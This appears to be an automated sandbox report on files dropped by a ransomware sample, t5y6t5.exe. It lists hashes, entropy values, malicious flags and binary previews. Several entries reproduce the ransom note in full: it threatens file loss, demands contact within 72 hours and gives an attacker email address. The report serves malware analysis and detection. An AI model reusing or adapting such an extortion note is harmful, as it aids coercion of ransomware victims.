                                                                                            Preview:.Rse..#....h.:}.V...k{+.XE..K3......,P|*.?....,...+.x.}.%.eO......J..$..h^... ..(..p..D'.I).6.4.q.....V...*..;w.pH.\.Y7T..... "Bc..\...../*.....t...CRH......a)..Y.Z.[#UwUK...1W....O.M....V\7.U<....+.......M...H.BE......ja>...+...o.;5..a._.Nj......Wq.o.Y.5.,.L.$.`]..d(N.U........#..;.W...;.7<.|.@.....el..y.V.1.....CL.O.nJ.!...*.........R...B5.c$fO....o~..]){...7..b%H?!P....$F.{.V.G.8..J.....^..!9..cY3.?>....s.|.[.|..>,.......y3.fV...J.r......$......:[....lQ.@LH.i.p..K;...9..:.[K7.....d4.&C........@iO....c.'..E.nr.#..P.W..N....l.....%..u.|).i_._...V.s.j..z.vwUF|).\.].f..l.1.{?FF.J...K...aB=WQ..`.&..{...S....,.V..B.v=.&.F..T..@...[4.$xa.z^...w.b..o...{..4.i.O.g../T-..x...$....r.W. .-V..O3E...k..P........lboG..QX.X....&...#.,3..x...@5.+..ov}.1.g..6.........[..yB.3....#.zpjY..S..9.?.........(..G4....4&t>..wj.....e.....0.....=.R.....0.%2."u..r..\g...ts.Vbg.~.?..j.Tw...K...eh~....P#...14.A.........B8.Z.&.b..[..3...(......~.u....D......N.....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):3851
                                                                                            Entropy (8bit):7.944854544859667
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:EqBbxNgl4fv7hHfUKELJ2SfBEmm3In0IosemGmAGH:EKb0l4fVHwhfGn4n0DsBGmx
                                                                                            MD5:D09D3E370ABCE17A481E742F38C2FAB5
                                                                                            SHA1:4A008F3F10B9C8265A8B0B0EE63CF5044E19C0D3
                                                                                            SHA-256:B2903E5D60412F8DEFE2BA5D87FD2552F7E17C633196CBBDA7388A6DFA55E394
                                                                                            SHA-512:18E7FDF9BDB161D0EFAF6F088C50F3F7F337CFE8C07A41F3FA83E00C8F0D82D0F160AC57AA92A86A2A51A8C8886FFA5092A7FE166C94B2946C10C88627D22B17
                                                                                            Malicious:true
                                                                                            Preview:o..1...s..t3.+.Y..r..vC.A.....o.V.)E.F2.,y..1T..ze?m...^.S...3;X)...t...F.>..Ql[..H...}.j.[g..".`..oi].]aBm6T.>.B.d....V......"....-.?f.~D.".a...z.Nu>..w.9.....{....~......?.j;I..[..<....t/. ..|f.5.5>.....qW./U...@.............B+..;mN......0.);....lE.ap\.I..1.]|{.D.$|l.-s.1.......m.I.1o...F..k...E.<w.*Su.5.6.c..K.....;..=.V:..M.......A?.3...$~....1>._....Hg.N.B...f...Q.:bvPd.*{6&....@.d\.u%cU`c.....*U.E.>iB;.U...[e.I....D.4L......S..)...kH"...w9m..._..O...I..G.^.=..Q..^...m.aA.#.z...k%.9..`....t...e....Rs`f+V...>..o1@.j....;._.Y.t.\.<<Hv....~t&.}......j..>FL.".s.v.O.....:...x.....>...i....u.!NU8.......i..IV...D....i..;2}.+.pd.....0.\.&.?X..0.....l...Z...POr.h.Stl.R ..p..F...Z..|.,..Snt...w.....y....kd..PP.g.E|..C..(...d..Mb%........'...2.T..#N..1.......,~v.........B.....\.~c....2......}.Z7.`pPG...9..V...=(z/....v6a..Y.:.[..A...fh.j..e....V.../.....X.e.sC}...B`...T0..{.A......0XK.>.... ...5.=.U....M.....p.A...@f...5.........Nx.U.l.J.z9./..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):13864
                                                                                            Entropy (8bit):7.4259471012496405
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Q29zxooYkOkjAlgXDj3u5Oca4ezF2qqTmtCtApo9l:QkovkzjAsn+PavEqqCtCtz3
                                                                                            MD5:D4A70A764FC45B1342E4E1A773C0118F
                                                                                            SHA1:9AD442554406DC48384764E571DA862747972181
                                                                                            SHA-256:4103CC49899FB912988B0FE6C1089DF6A03718783BBAF4C9A824998F633545A5
                                                                                            SHA-512:E37A0629D7E34F027166FAFE5091BF66EA17B9CAC0FA6C00EBED1C222BAE58B3BC00469E410D585318A3BB149BAA4C6663DE7A96A0082DBACD40EC9B4D4698C7
                                                                                            Malicious:true
                                                                                            Preview:g.F..0k.6.q`.LR|...<-?.>...<Y..YK.k?"z$C+."...V.....%e)........#.K.}...CT...$.~eV.c...,z..%[Jwz.......Y...........cL....%i..6.PX;.D......M`..#.b...r3V....~.Qu#..Fd.... ..z.".i.kkb.b.=.r....T..d.'..'..1D..M.S.UQ.a.[,.#.w..$.#..;..I'..c.....U@.q.w.:?.]J.........`.....c\aDp.4`.w.tLOJ.h.*t....'..G..:?.`".(v.MVI.s...vS..X./.......=.[.p..t-...R...%u....r..j[...To.....C.4......t@ij?....\.....E.5..-J.s}.#......TA;.z[..6o.o.........(...t...3.R..R.1.....5....m".l..M...~j..y.+...$..M.C.EY.|.[...Ugg.E.../..9m...@......J.......B.....t{/....S.Fq..J....a.V.ZN!!......{.....,......9.iq.6..]N..-.....'...+....D6Km0Z$X..d.c.0l.rh.?.._B.5.^.Pb'..K4...^.i....k.rtK.k/>.9..bk...+d^.k.....@..S..:r.Z.. p,.5R...I%....C.w)..6...k.Aqd".7.>...M..V..a.kK,Q.6...f2^.U.%Kt.x.Vk.@..@.q....g.5........h..x.R..Y....n...E...)..q.{r].,K.\.....1#.HA....4...0......7.7R.3.i.1...f...."F...c...........;....L...A..>v.l/...'~..3K.&.3.<oa._K)."l!.....f^.T.&..L&.k..j.:W.j..^
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):13860
                                                                                            Entropy (8bit):7.427473830147567
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:fEwmO1V5CEj3u5Oca4ezF2qq3mACtApjxA:8wmO5+PavEqq2ACtcxA
                                                                                            MD5:B9AB9E54227F541F77C7ABF66AC00418
                                                                                            SHA1:4E272DA7E167DC19F9DAEAF6AD066868CD94F9F0
                                                                                            SHA-256:7DCD8D27560144A623C1C3ACFF749AA36F668E9BA0396716B640F535A1253C4B
                                                                                            SHA-512:35F86EA7D53DF19C9460ECE90C144501CFA8910FBA2BDA42768BE2E7E05EA8F1D02F1ABB4A923D16CCF0A2210B45D60C8FB0F37BA1868BE57A40EAD2FCB666BE
                                                                                            Malicious:true
                                                                                            Preview:...K_3.[D......YW.)X...^..X.ah...d......]..K..p.....Q..D...4.&........8E..YZ.#a.....H.j.!d!...d.rh$B......p>..$LR9..:H.YE.....A.?d..9.......i......R..2....f.9SZ...|Lc.cs...(....jq..hO.MQy.....1...+F.....0.O..]@.>..(WN?*...[K:.@;MA....|..st@.j..._..O......}.$q.Er....G..%..J....7....fv.......%...R_.\.p..w...>...3.lq=.qw+THC`.)l.R.......H..b+....1J...7.u.]...7[...H..$..A..anVD.-...NY.x..?.....s....o.T.l.....H...M..j......e..f...-.3..[Mo.z.|..{<1...OF.{t.kdg.....}.p..F.k.. ".$...F.{#...1.u.$....W.dq.9.......!H8:...........5."u...#..*.`[.....z.|u...+L.../6.^}.j.O..S...b.@X.l.-.\....>.... i...h.Zl.ch....p2.Z....-..7....+m@3.%S....B.9e..I..2.6..r.vt..+hL.8..V...Ns9.....J..8..M.B...a..F.,....{.. ..Fu...D.T.@r[...^L.o.>...N7...$..T^.]..X\.0..._.<.m.BZ.."....M..K...z...1.W.o...@=....,>t.........c....U+H..o...\.*.......}w.._}.....5.p......3]..~.>.Y.z..Z..6.w....9S.g.H..N.X..(.v\/.g.6..b.BH.......9..P..G"D.93p.R^NL..6O3z.....OA.....Q9f..}.....|<.=..<u..i..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):711
                                                                                            Entropy (8bit):7.683279845246166
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DfuqMeug8c4vNVlpzcEQiXIWbdOCiZWyYRj497iKnPw8GJjuZMhWAytUVRY07i/7:BziFVlpVXIwi03ji7iPXJqQ5yyVRmQu
                                                                                            MD5:CE569C28A9A3F49F6E16016CCBA72431
                                                                                            SHA1:823A83CD561C3CABB420ABF3FA09CDF432F5265E
                                                                                            SHA-256:E157111E0C5A6172F4E4055EED70B4B97476A4650557DF5D827D9BFCC3C2925D
                                                                                            SHA-512:A068E805ACDBF536D72D7DF7FE78DA9E09959B63E7F81D385B9E255D96BD850E6E8949A9DD54BF51F614814F83BDD1829810EA664ADC1BD14699A77B8AF017A1
                                                                                            Malicious:true
                                                                                            Preview:s..uHz.."(DD......!....^.z6.%g........(.#.......T...o..Y.uM..A.2.p......{A...U.)..v0.`,.w..x....#C..............P...MMB... c.....9kJ.8....bAS..#....S^..b.<......o.p.....ys'........^>./....#t.6.f,..Z.....K/..q../......=s.<.......E!7.[.J`."en.L...xU.A...D(/)xY.=.7.K........+.S..qQ.W..dQ..t<,.....{(]^....nS.....).H..{gRuk......v.4...E\n.A.....}I..QY<B&..n.&QT@..n..>.....$!.FD.....D....T..r.F.........&.&p71fbfafe8fb"}.t....m...i......u....[.;_.<z.'...R.T.i(..q...f.H....?...T.....K.z.i,.....U...<.u..n.TW.#..>.F.......@......W}C....KDO._..>......^...\.A(A..r!";'<...........q?.d..E.......P0.$j.XB.p..6.us..~...&..~...*%.....ox.c.....zN.<.#Q.......,k4..a.Yg}e....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):4614
                                                                                            Entropy (8bit):7.961423331594871
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:CBzfTnId8tI6LZ6BpGnBTNc6WxIndVo4C44jjNCf4eEvHQB70tSN7:C5fz88qmQSTNc6oGWo4gtqMKQ
                                                                                            MD5:13FBAAF8B05A7E99CCB876DE0F522E7E
                                                                                            SHA1:DD9C71DBC9C67D7A8A85785177AB46784DC05847
                                                                                            SHA-256:CABCAD902BCD7E7888A6BCA36FF6C85D00CED5BC6B0F1B49D85CFA78B0C6A663
                                                                                            SHA-512:0AE7EE8B1D7D056F2F7AE739406A7F692827348CB167A45AE28DC9C40A5C0DE5F3219807E9EE8F7F7AD287C64502094C1F1AD450835149D5D0DE8376F5E6E6C0
                                                                                            Malicious:true
                                                                                            Preview:..9a#.8C....m..fC)r...'.)......n....QB..{...".,.wm.@..PA....l....<...pF..-i.^.S...8H.....~.K[.'.zq....4#z.I..P..V..!..N.L..`..|..`......M(..n..o...X.0....5...........N.&.i....u..'.AT..<..u..]..S.....4 ...(...D.)...D.1.,tY.1 ..a[....]b...Q.9...v..N...q..g...|..x;.*X3aF..#.Xo..X...|...+....6H..x.......8..24..f.....|...v..y..ot..4.Zt..+....6..kQ..PRM.Y..<....q...Mq.....Zj..P)E....v.".wi.(X...U....:S\.27.!|.S.g......+..b....;.....~Q....DH[..*".1&`.j/0.N*.R...?.A..#sbgE.k&..jf..~k....z.a..#......g}2.|.'.n....C.e.kJ.j..zK..@........N...%).."ne..<.a...z..;.=....8.1.o.N..%F.<H`>.$.k.x.b.......hH...d..N..S...?p..f..1..^..-..vzCD6.]:=..3D.G.X.w...?..Kx..i$.J."C.....h.-W....W.....6......|..'5....'.....Hf...]/{.@Z...4.(......E)&I.3....!:.....+.Y..[........N.....z@..km.\..Dh...h........Y`..o............*..D_s.A`.`....6E.@.B.i..v..?.JU7.G.+.G.h.mLq.......$.f+.+.e..:....IZ...g...."..C..YvV.3F....!'.h.D....p.~R..j..MT....b..sg.^I.....:......t`Iq..M.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):710
                                                                                            Entropy (8bit):7.712972064578528
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:p1CbfVnuLvQKrzdPzr/wEUbDeIsr7pPnMq6XP/qS3wiUutvpGqPu8uvzMxsfyzHn:MfVnsfrzd7EHeIsr7xnDi/qS7gBnrMGY
                                                                                            MD5:DF04EEF315F6A7A68C3542C2068271CE
                                                                                            SHA1:D8362C606149B1E8D820EDDD6C8BF223CA8B066A
                                                                                            SHA-256:892D29A7D31B622E2336D16EE25C40DB3FC60EB56012C3E4AC70CD0C48164CFA
                                                                                            SHA-512:24DA769E6259A92170C999DBC609F0CE3D7D052C0359E4BF02BB392C48146022A3C2D4B1DAA1CD2C79C2957F46830E8ABF518B857FF6948631437915CDBD523A
                                                                                            Malicious:false
                                                                                            Preview:.TM.)....YB...y..D....E...i.u....P$ .n...P>.~..Nv.%_P.qY`vX..iU..=.....kC^ab&.@....0.AD....P..b....)...7....^R..M.....J.$.., ..g. ....(,.B.EQ.. ...Gq....O...27...A..:-..{d.9..L.\D.o..Y....*.&.^!..%5....p.3Ym}B....,.<^w..S.L...(R....>,J4X....I...'..C.GZ.F..$.W.WC..D.{..6>3....G.'..rD.,..!..d'RE....i"'.......t...Mi.........q.d\....#.A....<U|-`.h..p.%,D.r..9...]../Gn>h`....|..7.WI...-..k...RW(./..h..7......5..j...-.Q&^1fbfafe8fb"}o..<.t0..^^.............i..H.Z.g...vP......$.s.w3|..r.Y.p,g>*..PE2.C.^7b *.l..E.u...^.../......M.....K>...ove._S.(. .- @.i<A......h.....]...h.....Lc.6...N..]....Hr.:.E......l..j.w...^.^...|XKa...jz....@...X.5..&.e..U.`I....|v. .F._Q.t..Z/P...ds0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):15367
                                                                                            Entropy (8bit):7.3967554784202445
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:qJxE/CmfFZtUqM5ysrfhXpWhht/0vw06wfnzQnN0G1Dm:IEt9Tw5hh5Wt/0vbDfnzsNNRm
                                                                                            MD5:30DCACB3F973F6010D1F50B1D300B7CE
                                                                                            SHA1:37C6345B0AC04971EB2A330F5F8BA07301F3480A
                                                                                            SHA-256:DA67B4491CE60DF1BD16A3E89BBEB1847093B758C7CCE8C81BF8C3D6C92B5186
                                                                                            SHA-512:6BE1B9C52082677AC6C182B3A310E2AA5FB8D52BA7C08B89F68338600BDB4F0B09B87E4CB5F41DFF5B2CB8B76D36B2AB9C2D7C8D70A0BF49598D6BB99345D6C3
                                                                                            Malicious:true
                                                                                            Preview:],.P...P.g.O~...\_.8..@...`x.:k,.WGu..+..[.(.=V.K..A3h..!..0.v../.....9w..n..........HiA.7Q.%`...w. @...H....*VOt.}.yb..,.&..l.{9...?0..~......1.wg..O..-`.5p.."0.^..m`.:H.G8.]z.......M.}.#...ijY...E1....Ot2Ty.4...:..Z.....{U..}mX...i.`~(g=......f...d..#......`;...}..d.....B......?.....c..V..`....;......l....[.8{.4R...Y(..f6.dX.i....w.>...Hx...j.N9D......H.x.bSsM.....).......a~../a.7<=LV..;y..8..v.oV..l../\...A..T....&Z.zi..",.I.....,....ZTw%.......u.../..M..^.H<..p.a..y.P......"....*S.T.....[V.%.%FO....?....T{H...@c..BkxJ.1D..z..~R....v.q..T..."........^..1NB+M)...j.`\..aL.?.[..@.d...*......G..=.r+..,.....b.....^...t.u.t..u$_{..3..6R.V..h...HT.$6g&f7...*a..g..g.<d..W7..ug....:;..Iou....Z......z.S=.u...n2s.......6E.7...:..."2'..`.........?.....h.iai(....>v.d.T....M...Q.n.$N.O.d....b.]F:.......N...nr.........}...%b:...>N.\......a....o...k?."I..&.>v.Q../.........<@!]....@B}..f...L..nM.......c.._Ax.U....uvK...$....g....z.w..aY6...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):12771
                                                                                            Entropy (8bit):6.01974452379341
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:mEANYGaEUtSQTjYgQ9D2EHRvbpbWbrbzpaOe:mEA/7UagQ9D2EHRvbpbWbrbz6
                                                                                            MD5:EE82ABB306113DBC8341020543DE716C
                                                                                            SHA1:AF2D47385F2712BD46C2A95D699892DAD62AE0BC
                                                                                            SHA-256:3967793A5171D9EDAC3F9CE8EB3C81B09916EF8FDD897432D27AE71F7FA767B0
                                                                                            SHA-512:328C5E9C520A4549D2664E1C4B3F53237D1521ADB5B6773906AC56D2F328FAF647BE38A568372A698B4A1E7EF9D69A890D7847077E593791B3A3D5554B4365B3
                                                                                            Malicious:true
                                                                                            Preview:.~...I<..F1v.m....s._m1.Xd....{..I.e..M.&Z......3Aq.4v..Q+..j.v......._T;I.0....#rcC..7..C?..+..Xs{.t.g..l+....~.\.ek......:..8...KW..W..+..)..dj..:@.v.I.............l.|....3..]..Z,k...E.D7n.fp."u.n.|..Mx.<.RB$..:u}...X"A...(....V....BXH.~.............@......~.....K.T.T;.....Y....'...%mNk...9..*b.x...4]<.."...z/.p.?p.1:p..8..K...:d.|...w6.".z.J.z>.\.;.M.tR..@...c.Z.....x.3.......s-..?@h..FDR..!.e..8.....2....r.+{_?..h.t.KCE,....'.W..2R...j..M6u% .*........#...'..'b.R.9....E..jQ".z.`....).u.#7.%.n....u.k.?X.".V..q1..DH.y.r.6s..w..j..P;*K;..4.l.~O.km.y..N..t..o....S.nl.5'..Q.E}..`6..8W.,.._.|..I..n.w.Nb...S Xzp...5d.R.]...;.7......W|...{S{.J;..L.|...p..-Y.....4..j..).g(.k....I%...n[........../..>l.Z[R"Wv......+.m..6.u.N.:..$...bo<>x..........P.W:.iA....T...j..;..K.~B.s..NnY....:..R..J.x...I..!..V......8E...Kh,.....r....(1....m;..9id...F..<.).....{.....;.E.:<.VH "..o.....'.M..F..|".T....q..A.3...D..u.=(.......N ..3..2.s...w.l1...m.-:..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1614
                                                                                            Entropy (8bit):7.883085076828831
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:BhfF7oiw6klqhbQowEhEFgJIYAJUv5Un+dUWpk:vqljAhsowEmFMIYpB+Qk
                                                                                            MD5:9DAA5DC46BE169AFE690A22B32DB6BF1
                                                                                            SHA1:6C4608FACC6CBED0C9280E7FA9B1D4D50DBE4D67
                                                                                            SHA-256:02DC5D5B7CAD8A8CC736EF9BD29282649D26DDCAEC7ABFEA29B03492119EE11D
                                                                                            SHA-512:DE8C438C5B91225D3746807003E05B0A317FE3BC3E3FD23E90A0DAB8954A4638849E46F77AEEE785F9D96CD86174A1E0EB3F41EB16AEAD5C35B42229F0FC6482
                                                                                            Malicious:true
                                                                                            Preview:.yf.E...&..a,.WL..~..e......N.).fK;.....$Y.."[.J.]....../...21.....C.....J...0~>..P......\.<cUE.Z.wG4..>pE.....{7gI@.....T..cz..k.GTV.c..L-v....J..5h...&..Kve.".#..N<..N.....[.S....T.uL].H...O.."Pd..}...v.n....Dn...h.|.w/.d....w.p%.D..3.u..L...H..$...$!....$....[...W...W...,......!{1o0F.x...$=.1. .F...2.?.E...#E:...Y..O.~$TL......P...H%.s"D.zs...?=.....@...6.O..)C.).:.....6...0=\..R......H.....#..Kn.}!.h4...RW..e}..w%...F.O.h..8..L2L.5k*.y.z....>...fg].......,...O1...C][.....K......-.Y.[.$.G.{...I....8`......$.W...Rb..Fl)8Wi.;...ER..w.O#.aY.J.....3.].a:w.k.d...Xe....7J..[...\...4.$..*_..w......U.....\.=...{.....r..z..z..c2.:....k.+*..v........wp*7>.[..un?.....s.0.dR/l.;.;Cd..,.......<.....B.7.}......S.B7..[...fJ...;)... ...b......5kH.N...p.Q(.f...g ..{7.J.|>..R...,..gz.uT.Zb;...42D.M.p..G.......'..3.jfi..|R....v&..X...v.:..&....9....[.A...D.!....g..'..+"l.^..&.....a..9..&.P.hq..6!q.Yi.T.\...#.Uz..7.ZL....#..*.D..........(.z:.7.M..9..u
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1688
                                                                                            Entropy (8bit):7.887134203803613
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:TPo5FUl9awPptb3ciD38vry2kPH8HO18k9p:7oTW9aw/bvsryzW2
                                                                                            MD5:18C27C4245EF5CA7C9442C4D4D5D773D
                                                                                            SHA1:DDA282D984E3C0905D5EE1EF62BFDFA76C43483A
                                                                                            SHA-256:821B15F57392F3CD1F458396DC3A8FAFCA0C4BBDC814F447A83E8F70DC551E27
                                                                                            SHA-512:6BB4C742A7750F3ABA9416B70EA8C6F405F3863414D1FF4F837736FD3950465C8A3A6AA57E9F38E50E684F5D0373EBE019394080FFB34EF66F92E12BE03C8EC9
                                                                                            Malicious:true
